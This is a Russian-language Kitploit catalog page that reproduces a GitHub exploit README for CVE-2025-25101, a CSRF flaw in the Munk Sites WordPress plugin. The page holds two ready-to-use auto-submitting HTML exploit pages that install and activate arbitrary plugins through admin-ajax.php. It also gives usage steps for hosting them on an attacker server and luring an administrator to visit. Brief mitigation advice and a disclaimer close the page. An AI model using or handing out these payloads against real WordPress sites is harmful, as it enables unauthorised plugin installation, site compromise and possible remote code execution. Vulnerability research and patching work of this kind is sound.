Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-25101 — Плагин Munk Sites для WordPress <= 1.0.7 – CSRF уязвимость, приводящая к произвольной установке плагинов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-25101
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФишингСоциальная инженерияОбучение и Образование
GitHubnxploited/cve-2025-25101

CVE-2025-25101

Плагин Munk Sites для WordPress <= 1.0.7 – CSRF уязвимость, приводящая к произвольной установке плагинов

Репозиторий
141 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚀 CVE-2025-25101 - Плагин Munk Sites для WordPress <= 1.0.7 - CSRF для произвольной установки плагинов

📌 Обзор

CVE-2025-25101 — это уязвимость Межсайтовой подделки запроса (CSRF) в плагине MetricThemes Munk Sites для WordPress (версии ≤ 1.0.7).
Эта уязвимость позволяет неаутентифицированному злоумышленнику обмануть администратора, заставив его установить и активировать произвольные плагины, что потенциально может привести к удаленному выполнению кода (RCE) или компрометации сайта.

🛑 Уязвимые версии

  • Плагин Munk Sites <= 1.0.7
  • WordPress Любая версия, где плагин активен

🛡️ Оценка безопасности (CVSS Score)

БаллСерьезностьВерсияСтрока вектора
9.6🔥 КРИТИЧЕСКАЯ3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 Описание эксплойта

🛠️ Как работает уязвимость:

Дефект CSRF в плагине Munk Sites позволяет злоумышленнику заставить вошедшего в систему администратора WordPress установить и активировать любой плагин WordPress без его согласия.
Это делается путем эксплуатации незащищенного запроса к admin-ajax.php, в котором отсутствует проверка CSRF-токена.

📌 Рабочий процесс эксплойта:

  1. Злоумышленник создает вредоносную веб-страницу, содержащую CSRF-полезную нагрузку.
  2. Жертва (администратор WordPress) посещает страницу злоумышленника.
  3. Эксплойт незаметно отправляет запросы на WordPress для установки и активации произвольного плагина.
  4. Плагин устанавливается и активируется без какого-либо взаимодействия с администратором.

💻 Код эксплойта

1️⃣ CSRF-эксплойт - Установка плагина

Эта полезная нагрузка заставляет жертву установить плагин hello-world.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ CSRF-эксплойт - Активация плагина

Эта полезная нагрузка заставляет жертву активировать плагин hello-world.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 Как использовать

  1. Разместите вредоносные HTML-файлы (install.html и activate.html) на сервере, контролируемом злоумышленником.
  2. С помощью социальной инженерии заставьте администратора WordPress посетить install.html.
  3. После установки плагина обманом заставьте его посетить activate.html.
  4. Плагин hello-world будет установлен и активирован без согласия администратора!

🚧 Смягчение

🔒 Как защитить свой сайт WordPress:

  • Обновите плагин Munk Sites до последней версии (если доступно исправление).
  • Используйте плагин безопасности WordPress, такой как Wordfence или Sucuri, для блокировки CSRF-атак.
  • Ограничьте доступ к admin-ajax.php с помощью правил безопасности в .htaccess или конфигурации Nginx.
  • Убедитесь, что только аутентифицированные и авторизованные пользователи могут устанавливать или активировать плагины.
  • Реализуйте защиту CSRF с помощью wp_nonce_field() и check_admin_referer().

📜 Отказ от ответственности

⚠️ Этот эксплойт предназначен только для образовательных целей и исследований в области безопасности.
⚠️ Несанкционированное использование против систем без явного разрешения незаконно.
⚠️ Автор не несет ответственности за любое неправомерное использование этого кода.


⭐ Поддержка и вклад

Если вы считаете это исследование ценным, не стесняйтесь ⭐ поставить звезду репозиторию и внести свой вклад, сообщая о новых уязвимостях.

Автор: Nxploit | Khaled Alenazi

Скачать инструмент